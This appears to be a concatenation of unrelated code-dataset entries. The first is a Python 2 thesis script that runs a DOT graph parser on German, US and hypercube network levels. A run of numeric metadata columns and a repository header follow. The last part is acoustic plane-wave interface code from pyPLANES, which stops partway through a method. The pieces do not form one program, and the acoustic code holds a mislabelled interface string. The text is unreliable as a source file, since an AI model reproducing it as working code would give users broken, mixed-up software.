#! /usr/bin/python
#Master-Thesis dot parsing framework
#Date: 17.11.2014
#Author: Bruno-Johannes Schuetze
#uses python 2.7.6
#script starts the complete process to generate Data for the purpose of this thesis
#The DotParser.py is started 7 times for each of the GER and USA topologies (Level 0 - 6) and 5 times for the 6D_HC topology (Level 0 - 4)
#
#usage: python scriptStarter.py
import subprocess
print "#####################################################################"
print "##STARTING GER NETWORK###############################################"
print "#####################################################################"
#reset counter
count = 0
######0
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
print graphName
graphPath = "Networks/FINAL/"+graphName+".dot"
print graphPath
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######1
print "starting:GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######2
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######3
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######4
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######5
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######6
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
print "done.\n"
print "#####################################################################"
print "############################STARTING USA NETWORK#####################"
print "#####################################################################"
#reset counter
count = 0
######0
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
print graphName
graphPath = "Networks/FINAL/"+graphName+".dot"
print graphPath
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######1
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######2
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######3
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######4
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######5
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######6
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
print "done.\n"
print "#######################################################################"
print "##########################################STARTING 6D HC NETWORK#######"
print "#######################################################################"
#reset counter
count = 0
######0
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
print graphName
graphPath = "Networks/FINAL/"+graphName+".dot"
print graphPath
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######1
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######2
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######3
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######4
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
print "#####################################################################"
print "################################################################DONE#"
print "#####################################################################"
| 32.468208
| 119
| 0.614741
| 661
| 5,617
| 5.186082
| 0.1059
| 0.088681
| 0.144107
| 0.121937
| 0.901109
| 0.901109
| 0.901109
| 0.901109
| 0.901109
| 0.873979
| 0
| 0.012641
| 0.084565
| 5,617
| 172
| 120
| 32.656977
| 0.654026
| 0.071925
| 0
| 0.962121
| 1
| 0
| 0.420287
| 0.155888
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.007576
| null | null | 0.416667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
6850781e081f0d83e5ae5f0bec6912fe91504143
| 30,693
|
py
|
Python
|
pyPLANES/pw/pw_interfaces.py
|
matael/pyPLANES
|
7f591090446303884c9a3d049e42233efae0b7f4
|
[
"MIT"
] | null | null | null |
pyPLANES/pw/pw_interfaces.py
|
matael/pyPLANES
|
7f591090446303884c9a3d049e42233efae0b7f4
|
[
"MIT"
] | null | null | null |
pyPLANES/pw/pw_interfaces.py
|
matael/pyPLANES
|
7f591090446303884c9a3d049e42233efae0b7f4
|
[
"MIT"
] | 1
|
2020-12-15T16:24:08.000Z
|
2020-12-15T16:24:08.000Z
|
#! /usr/bin/env python
# -*- coding:utf8 -*-
#
# pw_interfaces.py
#
# This file is part of pyplanes, a software distributed under the MIT license.
# For any question, please contact one of the authors cited below.
#
# Copyright (c) 2020
# Olivier Dazel <olivier.dazel@univ-lemans.fr>
# Mathieu Gaborit <gaborit@kth.se>
# Peter Göransson <pege@kth.se>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
import numpy as np
from numpy import sqrt
from pyPLANES.utils.io import load_material
from pyPLANES.pw.pw_polarisation import fluid_waves_TMM
class PwInterface():
"""
Interface for Plane Wave Solver
"""
def __init__(self, layer1=None, layer2=None):
self.layers = [layer1, layer2]
def update_M_global(self, M, i_eq):
pass
def update_Omega(self, Om):
pass
def update_frequency(self, omega, kx):
pass
class FluidFluidInterface(PwInterface):
"""
Fluid-fluid interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Fluid-fluid interface"
return out
def update_frequency(self, omega, kx):
pass
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam[0]*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam[0]*self.layers[1].d)
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[0, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[0, 1]
M[i_eq, self.layers[1].dofs[0]] = -self.layers[1].SV[0, 0]
M[i_eq, self.layers[1].dofs[1]] = -self.layers[1].SV[0, 1]*delta_1
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[1, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[1, 1]
M[i_eq, self.layers[1].dofs[0]] = -self.layers[1].SV[1, 0]
M[i_eq, self.layers[1].dofs[1]] = -self.layers[1].SV[1, 1]*delta_1
i_eq += 1
return i_eq
def transfert(self, Om):
return Om.reshape(2,1), np.eye(1)
class FluidPemInterface(PwInterface):
"""
Fluid-PEM interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Fluid-PEM interface"
return out
def transfert(self, Om):
a = -np.array([
[Om[0,1],Om[0,2]],
[Om[3,1],Om[3,2]]
])
Tau = np.dot(np.linalg.inv(a), np.array([[Om[0,0]], [Om[3,0]]]))
Tau_tilde = np.concatenate([np.eye(1),Tau])
Omega_moins = np.array([[Om[2,0]], [Om[4,0]]]) + np.dot(np.array([[Om[2,1], Om[2,2]], [Om[4,1], Om[4,2]]]), Tau)
return Omega_moins.reshape(2,1), Tau_tilde
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam[0]*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[2, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[2, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[2, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[2, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[2, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[2, 5]*delta_1[2]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[1, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = SV_1[1, 1]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[4, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[4, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[4, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[4, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[4, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[4, 5]*delta_1[2]
i_eq += 1
M[i_eq, self.layers[1].dofs[0]] = SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[0, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[0, 2]
M[i_eq, self.layers[1].dofs[3]] = SV_2[0, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = SV_2[0, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = SV_2[0, 5]*delta_1[2]
i_eq += 1
M[i_eq, self.layers[1].dofs[0]] = SV_2[3, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[3, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[3, 2]
M[i_eq, self.layers[1].dofs[3]] = SV_2[3, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = SV_2[3, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = SV_2[3, 5]*delta_1[2]
i_eq += 1
return i_eq
class PemFluidInterface(PwInterface):
"""
PEM-Fluid interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t PEM-Fluid interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam[0]*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
M[i_eq, self.layers[0].dofs[0]] = -SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[2, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[2, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[2, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[2, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[0, 1]*delta_1
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = -SV_1[4, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[4, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[4, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[4, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[4, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[4, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[1, 1]*delta_1
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[0, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[0, 3]
M[i_eq, self.layers[0].dofs[4]] = SV_1[0, 4]
M[i_eq, self.layers[0].dofs[5]] = SV_1[0, 5]
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = SV_1[3, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[3, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[3, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[3, 3]
M[i_eq, self.layers[0].dofs[4]] = SV_1[3, 4]
M[i_eq, self.layers[0].dofs[5]] = SV_1[3, 5]
i_eq += 1
return i_eq
class FluidElasticInterface(PwInterface):
"""
Fluid-Elastic interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Fluid-Elastic interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam[0]*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of u_y
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[1, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[1, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[1, 3]*delta_1[1]
i_eq += 1
# sigma_yy = -p
M[i_eq, self.layers[0].dofs[0]] = SV_1[1, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = SV_1[1, 1]
M[i_eq, self.layers[1].dofs[0]] = SV_2[2, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[2, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[2, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[2, 3]*delta_1[1]
i_eq += 1
# sigma_xy = 0
M[i_eq, self.layers[1].dofs[0]] = -SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[0, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[0, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[0, 3]*delta_1[1]
i_eq += 1
return i_eq
def transfert(self, O):
tau = -O[0,0]/O[0,1]
Omega_minus = np.array([[O[1,1]], [-O[2,1]]])*tau + np.array([[O[1,0]], [-O[2,0]]])
tau_tilde = np.concatenate([np.eye(1,1), np.array([[tau]])])
return (Omega_minus, tau_tilde)
class ElasticFluidInterface(PwInterface):
"""
Elastic-Fluid interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Elastic-Fluid interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam[0]*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of u_y
M[i_eq, self.layers[0].dofs[0]] = -SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[1, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[1, 3]
M[i_eq, self.layers[1].dofs[0]] = SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[0, 1]*delta_1
i_eq += 1
# sigma_yy = -p
M[i_eq, self.layers[0].dofs[0]] = SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[2, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[2, 3]
M[i_eq, self.layers[1].dofs[0]] = SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[1, 1]*delta_1
i_eq += 1
# sigma_xy = 0
M[i_eq, self.layers[0].dofs[0]] = -SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[0, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[0, 3]
i_eq += 1
return i_eq
def transfert(self, Om):
Omega_moins = np.zeros((4,2), dtype=np.complex)
Omega_moins[1,0] = Om[0,0]
Omega_moins[2,0] = -Om[1,0]
Omega_moins[3,1] = 1
Tau_tilde = np.zeros((1,2), dtype=np.complex)
Tau_tilde[0,0] = 1
return (Omega_moins, Tau_tilde.reshape(1,2))
class ElasticElasticInterface(PwInterface):
"""
Elastic-Elastic interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Elastic-Fluid interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of all four components of the elastic state vector
for _i in range(4):
M[i_eq, self.layers[0].dofs[0]] = -SV_1[_i, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[_i, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[_i, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[_i, 3]
M[i_eq, self.layers[1].dofs[0]] = SV_2[_i, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[_i, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[_i, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[_i, 3]*delta_1[1]
i_eq += 1
return i_eq
def transfert(self, Om):
return Om, np.eye(2)
class PemPemInterface(PwInterface):
"""
PEM-PEM interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t PEM-PEM interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of all six components of the PEM state vector
for _i in range(6):
M[i_eq, self.layers[0].dofs[0]] = -SV_1[_i, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[_i, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[_i, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[_i, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[_i, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[_i, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[_i, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[_i, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[_i, 2]
M[i_eq, self.layers[1].dofs[3]] = SV_2[_i, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = SV_2[_i, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = SV_2[_i, 5]*delta_1[2]
i_eq += 1
return i_eq
def transfert(self, O):
return (O, np.eye(3))
class ElasticPemInterface(PwInterface):
"""
Elastic-PEM interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Elastic-PEM interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
''' S={0:\sigma_{xy}, 1: u_y, 2 \sigma_{yy}, 3 u_x}'''
SV_2 = self.layers[1].SV
''' S={0:\hat{\sigma}_{xy}, 1:u_y^s, 2:u_y^t, 3:\hat{\sigma}_{yy}, 4:p, 5:u_x^s}'''
# Continuity of sigma_xy
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[0, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[0, 3]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[0, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[0, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[0, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[0, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[0, 5]*delta_1[2]
i_eq += 1
# Continuity of u_y^s
M[i_eq, self.layers[0].dofs[0]] = SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[1, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[1, 3]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[1, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[1, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[1, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[1, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[1, 5]*delta_1[2]
i_eq += 1
# Continuity of u_y^t
M[i_eq, self.layers[0].dofs[0]] = SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[1, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[1, 3]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[2, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[2, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[2, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[2, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[2, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[2, 5]*delta_1[2]
i_eq += 1
# Continuity of sigma_yy = \hat{\sigma}_{yy} - p
M[i_eq, self.layers[0].dofs[0]] = -SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[2, 2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[2, 3]
M[i_eq, self.layers[1].dofs[0]] = (SV_2[3, 0]-SV_2[4, 0])
M[i_eq, self.layers[1].dofs[1]] = (SV_2[3, 1]-SV_2[4, 1])
M[i_eq, self.layers[1].dofs[2]] = (SV_2[3, 2]-SV_2[4, 2])
M[i_eq, self.layers[1].dofs[3]] = (SV_2[3, 3]-SV_2[4, 3])*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = (SV_2[3, 4]-SV_2[4, 4])*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = (SV_2[3, 5]-SV_2[4, 5])*delta_1[2]
i_eq += 1
# Continuity of u_x^s
M[i_eq, self.layers[0].dofs[0]] = SV_1[3, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = SV_1[3, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = SV_1[3, 2]
M[i_eq, self.layers[0].dofs[3]] = SV_1[3, 3]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[5, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[5, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[5, 2]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[5, 3]*delta_1[0]
M[i_eq, self.layers[1].dofs[4]] = -SV_2[5, 4]*delta_1[1]
M[i_eq, self.layers[1].dofs[5]] = -SV_2[5, 5]*delta_1[2]
i_eq += 1
return i_eq
def transfert(self, O):
Dplus = np.array([0, 1, -1, 0, 0, 0])
Dmoins = np.zeros((4,6), dtype=np.complex)
Dmoins[0,0] = 1
Dmoins[1,1] = 1
Dmoins[2,3] = 1
Dmoins[2,4] = -1
Dmoins[3,5] = 1
Tau = -Dplus.dot(O[:,2:4])**-1 * np.dot(Dplus, O[:,0:2])
Omega_moins = Dmoins.dot(O[:,0:2] + O[:,2:4]*Tau)
Tau_tilde = np.vstack([np.eye(2), Tau])
return (Omega_moins, Tau_tilde)
class PemElasticInterface(PwInterface):
"""
PEM-Elastic interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t PEM-Elastic interface"
return out
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
# Continuity of sigma_xy
M[i_eq, self.layers[0].dofs[0]] = -SV_1[0, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[0, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[0, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[0, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[0, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[0, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[0, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[0, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[0, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[0, 3]*delta_1[1]
i_eq += 1
# Continuity of u_y^s
M[i_eq, self.layers[0].dofs[0]] = -SV_1[1, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[1, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[1, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[1, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[1, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[1, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[1, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[1, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[1, 3]*delta_1[1]
i_eq += 1
# Continuity of u_y^t
M[i_eq, self.layers[0].dofs[0]] = -SV_1[2, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[2, 1]*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = -SV_1[2, 2]*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = -SV_1[2, 3]
M[i_eq, self.layers[0].dofs[4]] = -SV_1[2, 4]
M[i_eq, self.layers[0].dofs[5]] = -SV_1[2, 5]
M[i_eq, self.layers[1].dofs[0]] = SV_2[1, 0]
M[i_eq, self.layers[1].dofs[1]] = SV_2[1, 1]
M[i_eq, self.layers[1].dofs[2]] = SV_2[1, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = SV_2[1, 3]*delta_1[1]
i_eq += 1
# Continuity of sigma_yy = \hat{\sigma}_{yy} - p
M[i_eq, self.layers[0].dofs[0]] = (SV_1[3, 0]-SV_1[4, 0])*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = (SV_1[3, 1]-SV_1[4, 1])*delta_0[1]
M[i_eq, self.layers[0].dofs[2]] = (SV_1[3, 2]-SV_1[4, 2])*delta_0[2]
M[i_eq, self.layers[0].dofs[3]] = (SV_1[3, 3]-SV_1[4, 3])
M[i_eq, self.layers[0].dofs[4]] = (SV_1[3, 4]-SV_1[4, 4])
M[i_eq, self.layers[0].dofs[5]] = (SV_1[3, 5]-SV_1[4, 5])
M[i_eq, self.layers[1].dofs[0]] = -SV_2[2, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[2, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[2, 2]*delta_1[0]
M[i_eq, self.layers[1].dofs[3]] = -SV_2[2, 3]*delta_1[1]
i_eq += 1
# Continuity of u_x^s
M[i_eq, self.layers[0].dofs[0]] = -SV_1[5, 0]*delta_0[0]
M[i_eq, self.layers[0].dofs[1]] = -SV_1[5, 1]*delta_0[1]
